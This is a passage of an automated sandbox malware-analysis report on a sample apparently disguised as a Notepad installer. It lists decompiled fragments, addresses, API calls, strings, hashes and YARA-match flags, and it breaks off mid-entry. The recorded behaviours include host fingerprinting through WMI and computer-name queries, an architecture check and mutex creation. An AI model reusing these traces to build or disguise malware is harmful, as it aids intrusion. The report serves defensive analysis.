					if( *(__ebp + 8) != 0) {
						__edx =  *(__ebp + 8);
						__esi = E00408C90(__esi,  *(__ebp + 8));
					}
					goto L25;
				}
			}




                                      0x004093a0
                                      0x004093a0
                                      0x004093a0
                                      0x004093a3
                                      0x004093a5
                                      0x004093a8
                                      0x004093aa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004093ac
                                      0x004093ac
                                      0x004093ac
                                      0x004093af
                                      0x004093b2
                                      0x004093b4
                                      0x00000000
                                      0x00000000
                                      0x004093b6
                                      0x004093ba
                                      0x004093bd
                                      0x004093c0
                                      0x004093c3
                                      0x004093c5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004093c5
                                      0x00000000
                                      0x004093c7
                                      0x004093c7
                                      0x004093ca
                                      0x004093cd
                                      0x004093d2
                                      0x004093d4
                                      0x004093d6
                                      0x004093d8
                                      0x00409616
                                      0x00409406
                                      0x00409406
                                      0x004092f0
                                      0x004092f0
                                      0x004092f0
                                      0x004092f6
                                      0x004092fb
                                      0x004092fd
                                      0x004092ff
                                      0x00000000
                                      0x00000000
                                      0x0040943b
                                      0x00409440
                                      0x00409443
                                      0x00409445
                                      0x0040944b
                                      0x00409451
                                      0x00409451
                                      0x0040928f
                                      0x0040928f
                                      0x00409291
                                      0x00409297
                                      0x0040929c
                                      0x0040929e
                                      0x004092a0
                                      0x00000000
                                      0x00000000
                                      0x004092a6
                                      0x004092aa
                                      0x00409288
                                      0x00409288
                                      0x00000000
                                      0x00409288
                                      0x004092ac
                                      0x004092af
                                      0x004092b4
                                      0x004092b7
                                      0x004092b9
                                      0x00409260
                                      0x00409264
                                      0x00000000
                                      0x00000000
                                      0x00409266
                                      0x00409269
                                      0x0040926b
                                      0x00000000
                                      0x00000000
                                      0x0040926d
                                      0x00409274
                                      0x00409278
                                      0x0040927a
                                      0x0040927d
                                      0x0040927f
                                      0x00409281
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409281
                                      0x004092bb
                                      0x004092be
                                      0x004092c5
                                      0x004092c7
                                      0x004092c9
                                      0x004092d3
                                      0x004092d3
                                      0x004092d6
                                      0x004092d9
                                      0x004092e0
                                      0x004092e0
                                      0x004092e3
                                      0x00000000
                                      0x004092e3
                                      0x0040948d
                                      0x00409490
                                      0x00409480
                                      0x00409485
                                      0x00409065
                                      0x00409065
                                      0x00409305
                                      0x00409308
                                      0x0040930a
                                      0x00409312
                                      0x00409312
                                      0x00409312
                                      0x00409315
                                      0x00409318
                                      0x0040931b
                                      0x0040931d
                                      0x00409322
                                      0x00409324
                                      0x00000000
                                      0x00000000
                                      0x00409326
                                      0x0040932a
                                      0x0040932d
                                      0x00409330
                                      0x00409334
                                      0x00409337
                                      0x0040933a
                                      0x0040933f
                                      0x00409342
                                      0x00409344
                                      0x00409348
                                      0x0040934b
                                      0x0040934d
                                      0x0040934f
                                      0x00409494
                                      0x00409497
                                      0x00409499
                                      0x0040949c
                                      0x0040949f
                                      0x004094a3
                                      0x004094a7
                                      0x004094af
                                      0x004094b4
                                      0x004094b7
                                      0x004094ba
                                      0x004094bc
                                      0x00409573
                                      0x00409573
                                      0x00409576
                                      0x00000000
                                      0x00409576
                                      0x004094c2
                                      0x004094c4
                                      0x00000000
                                      0x00000000
                                      0x004094ca
                                      0x004094cd
                                      0x004094d1
                                      0x004094d4
                                      0x004094d4
                                      0x00409355
                                      0x00409355
                                      0x00409358
                                      0x0040935b
                                      0x0040935f
                                      0x00409363
                                      0x00409365
                                      0x00409368
                                      0x0040936d
                                      0x00409373
                                      0x00409378
                                      0x0040937b
                                      0x0040937e
                                      0x00409381
                                      0x00409386
                                      0x00409389
                                      0x0040938b
                                      0x0040938f
                                      0x00409392
                                      0x00000000
                                      0x00409392
                                      0x0040930c
                                      0x00409310
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409310
                                      0x004093de
                                      0x004093e1
                                      0x004093e3
                                      0x004093e9
                                      0x004093ee
                                      0x004093f1
                                      0x004093f5
                                      0x004094dd
                                      0x004094e0
                                      0x004094e2
                                      0x004095ee
                                      0x004095f3
                                      0x004095f6
                                      0x004095f8
                                      0x004095fe
                                      0x00409601
                                      0x00409604
                                      0x0040960b
                                      0x0040960b
                                      0x00000000
                                      0x004095f8
                                      0x004094e8
                                      0x004094eb
                                      0x004094ee
                                      0x004094f3
                                      0x00409516
                                      0x00409516
                                      0x00409519
                                      0x0040951c
                                      0x00409520
                                      0x00409522
                                      0x00409500
                                      0x00409524
                                      0x00409524
                                      0x00409524
                                      0x00409505
                                      0x00409507
                                      0x0040950a
                                      0x0040950c
                                      0x0040950e
                                      0x0040950e
                                      0x00409510
                                      0x00409512
                                      0x00000000
                                      0x00000000
                                      0x00409514
                                      0x00409514
                                      0x0040952b
                                      0x0040952e
                                      0x00409538
                                      0x0040953d
                                      0x00409540
                                      0x00409542
                                      0x00409548
                                      0x0040954b
                                      0x00409552
                                      0x00409558
                                      0x0040955a
                                      0x0040957d
                                      0x0040955c
                                      0x0040955c
                                      0x0040955c
                                      0x0040955a
                                      0x00000000
                                      0x00409542
                                      0x004093fb
                                      0x004093fe
                                      0x00409400
                                      0x00409564
                                      0x00409569
                                      0x00409569
                                      0x00000000
                                      0x00409400

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _strdupmemcpystrlen
                                      • String ID: @
                                      • API String ID: 126217880-2766056989
                                      • Opcode ID: 9c24902c5e30cb55f321b96a675ceb21fec390015c1737647a046163cf627364
                                      • Instruction ID: fe3117e29edfcc56e118669b082565f135b9c9798d243c11a71a70d7bb9af643
                                      • Opcode Fuzzy Hash: 9c24902c5e30cb55f321b96a675ceb21fec390015c1737647a046163cf627364
                                      • Instruction Fuzzy Hash: 49313A71D046558BCB14DFA9C0401AEFBF1AF84304F19896EDC95BB386EA39ED02CB85
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB068 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 006E9296: SysAllocString.OLEAUT32(?), ref: 006E92E1
                                        • Part of subcall function 006E9296: SysFreeString.OLEAUT32(?), ref: 006E930E
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(WQL), ref: 006E9365
                                        • Part of subcall function 006E9354: SysAllocString.OLEAUT32(?), ref: 006E936C
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93B5
                                        • Part of subcall function 006E9354: SysFreeString.OLEAUT32(00000000), ref: 006E93C0
                                      • VariantClear.OLEAUT32(?), ref: 006EB107
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$AllocFree$ClearVariant
                                      • String ID: ProcessorId$ROOT\CIMV2$SELECT * FROM Win32_Processor
                                      • API String ID: 261499160-627074212
                                      • Opcode ID: cfdcae43040ace65dd4aacd65597030defe7e9a7c559d0a416f7da4fd35a57b8
                                      • Instruction ID: d55312d4f1181cad164e5eca299a772d2d0f37bca393f1d405c6f92ce74e5020
                                      • Opcode Fuzzy Hash: cfdcae43040ace65dd4aacd65597030defe7e9a7c559d0a416f7da4fd35a57b8
                                      • Instruction Fuzzy Hash: B7312B72A01219AFCB00CB95C9449EFB7BAEF48710F144099F516E7250DB70AE45CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E5FA1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,?,00000000), ref: 006E5FAF
                                      • GetProcAddress.KERNEL32(00000000,KiUserExceptionDispatcher), ref: 006E5FBD
                                        • Part of subcall function 006E0517: memset.NTDLL ref: 006E0539
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProcmemset
                                      • String ID: KiUserExceptionDispatcher$ntdll.dll
                                      • API String ID: 3137504439-391726712
                                      • Opcode ID: bd7bc4af9d2db04d4839a064405b9205cc204da10baa395e02f1a99e667bd280
                                      • Instruction ID: d63141d69da0a8fd4d9865959ea2ca62e6ed13742e878e42eea463efd1979f47
                                      • Opcode Fuzzy Hash: bd7bc4af9d2db04d4839a064405b9205cc204da10baa395e02f1a99e667bd280
                                      • Instruction Fuzzy Hash: 4711B67280135ABBCB20ABA6CD84CEFBB7EEF64395B110459F90593242E630DA41CB71
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407110 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      • _assert.MSVCRT ref: 004071C5
                                        • Part of subcall function 00406AE0: memcpy.MSVCRT ref: 00406B47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _assertmemcpy
                                      • String ID: af[n_layers-2] == SANN_AF_SIGM$b$sfnn.c
                                      • API String ID: 1759651462-853114603
                                      • Opcode ID: a43b065e81bc5f520b38744c3821e2e60fc06f53effe96fa989c186c6bd61178
                                      • Instruction ID: efaa6bd42c175177b3739ec105c2edcfc0b731ca70b0f38abc6686090ecf7277
                                      • Opcode Fuzzy Hash: a43b065e81bc5f520b38744c3821e2e60fc06f53effe96fa989c186c6bd61178
                                      • Instruction Fuzzy Hash: 3A2165B4A09341CFC3009F1AD58451AFBE4BBC8754F12895EF8D863360C3B4A965CE9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E9F1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMutexW.KERNEL32(00000000,00000000,Random name), ref: 006E9F4E
                                      • SetHandleInformation.KERNEL32(00000000,00000002,00000002), ref: 006E9F5F
                                      • CloseHandle.KERNEL32(00000000), ref: 006E9F69
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Handle$CloseCreateInformationMutex
                                      • String ID: Random name
                                      • API String ID: 551106905-3259162790
                                      • Opcode ID: 1dc134e75a88fa329418a2200ddc38815a434626d2fdff26a6f44733cfc8b8e6
                                      • Instruction ID: 4ee3682afb69f00138d5aa2db194ffdc152c550a4b551933c25f914ce2880d76
                                      • Opcode Fuzzy Hash: 1dc134e75a88fa329418a2200ddc38815a434626d2fdff26a6f44733cfc8b8e6
                                      • Instruction Fuzzy Hash: FCF09675541754BBC3219B699D4AF6FBFB9EB81B20F100615F521E22C0C7740900CA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E8D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,006E86E5,00000000), ref: 006E8D77
                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 006E8D83
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsWow64Process$kernel32.dll
                                      • API String ID: 1646373207-3024904723
                                      • Opcode ID: 2b9e0674c2338e2c1df568fd73445a91b172f3170c9acd8b9de1ef0b75083ca8
                                      • Instruction ID: 13d8ad24b9cfa16ccf232b76cdd8761cb8658cca6c2e26f7a4c8ecf1dcbcf00f
                                      • Opcode Fuzzy Hash: 2b9e0674c2338e2c1df568fd73445a91b172f3170c9acd8b9de1ef0b75083ca8
                                      • Instruction Fuzzy Hash: 9AE0C970A1130AAFDB40CBAADD15BA977BAAB24349B104058B949D2290EBB0DA00DB10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405230 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: calloc$memcpy
                                      • String ID:
                                      • API String ID: 408996518-0
                                      • Opcode ID: 496fd151cc3c48e16d10be8a90bcdee9b0de26c3da543963b7166f9fe9d891bb
                                      • Instruction ID: 2b5e9b44f171ab256f009dd6ccb57ba63096bb93fcdddc9b69114f20b7a21c86
                                      • Opcode Fuzzy Hash: 496fd151cc3c48e16d10be8a90bcdee9b0de26c3da543963b7166f9fe9d891bb
                                      • Instruction Fuzzy Hash: 612147B08097049FDB10EF28C08075EBBE4EF84308F45886EE8889B382E779D844CF46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004031A7 Relevance: 6.2, APIs: 4, Instructions: 199COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: _errnomallocmemcpy
                                      • String ID:
                                      • API String ID: 2682620949-0
                                      • Opcode ID: e05f1a1e50549831afe1b03830c3a49291f5a8f1870574ff32da2a27a43884e0
                                      • Instruction ID: 7ae95b20c6939c2202671c4353697d9b608ecc7b5fcbeb4f374919dd075e137d
                                      • Opcode Fuzzy Hash: e05f1a1e50549831afe1b03830c3a49291f5a8f1870574ff32da2a27a43884e0
                                      • Instruction Fuzzy Hash: 30816E716083128FC714CF28C58022ABBE1BF88744F09896EE885AB385D774ED45CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004032D7 Relevance: 6.2, APIs: 4, Instructions: 170COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: malloc$_strdup$_readmemcpy
                                      • String ID:
                                      • API String ID: 508882997-0
                                      • Opcode ID: 312db82317f906323d64b4ebfd86c86768698df87ecac38df35ec8c57f58675a
                                      • Instruction ID: f5c6f150da34862c6af7f3345568895f557703f22d5750b41a81333fc9639a64
                                      • Opcode Fuzzy Hash: 312db82317f906323d64b4ebfd86c86768698df87ecac38df35ec8c57f58675a
                                      • Instruction Fuzzy Hash: 6961AF756083128FC715CF28C58032EBBE1BF85704F0949AEE885AB385D778ED45CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EE463 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.NTDLL(?,?,00000040,?,00000000,?,?,006E387B,?,00000018,00000020,?,?,?), ref: 006EE49F
                                      • memcpy.NTDLL(?,?,00000020,?,00000000,?,?,006E387B,?,00000018,00000020,?,?,?), ref: 006EE4EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: @$@
                                      • API String ID: 3510742995-149943524
                                      • Opcode ID: 0f864ece7f8b611ed8be4af693050dc0e2b40d811238cbeabf009b77263fa2ed
                                      • Instruction ID: 9d38d38ccadd160106be7d17a2205a00db14329c9475d5b01d950d172036251a
                                      • Opcode Fuzzy Hash: 0f864ece7f8b611ed8be4af693050dc0e2b40d811238cbeabf009b77263fa2ed
                                      • Instruction Fuzzy Hash: E3112773202349ABDF149EAA9C80CEF73AAFF40324B10852DFD1AC7181D776D9128B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E6530 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: callocmallocmemset
                                      • String ID: R1n
                                      • API String ID: 3201439907-4230899745
                                      • Opcode ID: 15c6ee03c25a517bc67df0d6e2c706fcca568fd72660dd2807fed000d79afd97
                                      • Instruction ID: eb9206cda092e9cee884c7671c765d5ba10877db99905cc6cbca0fa971669f82
                                      • Opcode Fuzzy Hash: 15c6ee03c25a517bc67df0d6e2c706fcca568fd72660dd2807fed000d79afd97
                                      • Instruction Fuzzy Hash: 3B116A726513059FDB04CF19DC85AAAB7EAEF98760B24842EF899C7340DB75F8418B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EA76B Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetComputerNameExW.KERNEL32(00000001,00000000,00000000,?,?,?,?,006EA6CE), ref: 006EA783
                                      • malloc.MSVCRT ref: 006EA78D
                                      • GetComputerNameExW.KERNEL32(00000001,00000000,00000000,?,?,?,006EA6CE), ref: 006EA7A1
                                      • ??3@YAXPAX@Z.MSVCRT ref: 006EA7A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ComputerName$??3@malloc
                                      • String ID:
                                      • API String ID: 136612370-0
                                      • Opcode ID: 671c9aace5ebc80e6742531d63df990c1d002d31ec41bca58d739e5d50dcf656
                                      • Instruction ID: 915a9da0b23af790ab32085d1868f86a6538461a14c421423034d87cc62c06b9
                                      • Opcode Fuzzy Hash: 671c9aace5ebc80e6742531d63df990c1d002d31ec41bca58d739e5d50dcf656
                                      • Instruction Fuzzy Hash: F1F0827A60124ABFDB10CBA5DC05FEE77BEDB84754F20005AE901D3240EAB0EA059B71
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E7AA1 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: accept-charse$content-lengt
                                      • API String ID: 1475443563-1366698354
                                      • Opcode ID: 464c3d094f2bbe87dc29611f409dbba6472d10e7ec0ccce26a0433d390717d82
                                      • Instruction ID: 4ea6094b9d8c354defda3aac2be11baf88a3545f75474795024d21886879837f
                                      • Opcode Fuzzy Hash: 464c3d094f2bbe87dc29611f409dbba6472d10e7ec0ccce26a0433d390717d82
                                      • Instruction Fuzzy Hash: 17E0261878A3C821D620516A6C02BB61E0B9B50766F4400B6FE949C387F602CE034254
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E6320 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: memset
                                      • String ID: &bn
                                      • API String ID: 2221118986-1044424250
                                      • Opcode ID: 36a3ac9016e4f1e2b6c1041355f55c51403d05f5e7b623dfa5d8b8a21ed02e85
                                      • Instruction ID: b2237709fec5313c83e8206349769bf0eb336f7ead71a956abeee874c288cbc1
                                      • Opcode Fuzzy Hash: 36a3ac9016e4f1e2b6c1041355f55c51403d05f5e7b623dfa5d8b8a21ed02e85
                                      • Instruction Fuzzy Hash: 10E0E67550172077D5746B66EC06F577AE9EF08B10F040908F5C597642D264F851C6A9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406433 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • sann_train, xrefs: 0040629A
                                      • [M::%s] epoch:%d running_cost:%g validation_cost:%g, xrefs: 004062B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: [M::%s] epoch:%d running_cost:%g validation_cost:%g$sann_train
                                      • API String ID: 383729395-3657084492
                                      • Opcode ID: 536fc80bf20152a525176cd9b6c5b28cd04f87c55a4c7b21effeae297574d4d2
                                      • Instruction ID: ee150b5c59dcbc013f2f222230f2b608886e7c18381d46a1ce3ebc699acf8048
                                      • Opcode Fuzzy Hash: 536fc80bf20152a525176cd9b6c5b28cd04f87c55a4c7b21effeae297574d4d2
                                      • Instruction Fuzzy Hash: 6951E4B06087419FC760EF65D18461ABBE0FF84744F428C2EE4C9A7391D739D8A4CB4A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406169 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • sann_train, xrefs: 0040629A
                                      • [M::%s] epoch:%d running_cost:%g validation_cost:%g, xrefs: 004062B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: [M::%s] epoch:%d running_cost:%g validation_cost:%g$sann_train
                                      • API String ID: 383729395-3657084492
                                      • Opcode ID: d11a165c4fd62e8db381ce64a1718b99143299acc3963a9da3798b68e3f877cb
                                      • Instruction ID: 388d141f2a26f2354d81c9231299d27c11ea6a356a9f24b531f1a87b1d736f18
                                      • Opcode Fuzzy Hash: d11a165c4fd62e8db381ce64a1718b99143299acc3963a9da3798b68e3f877cb
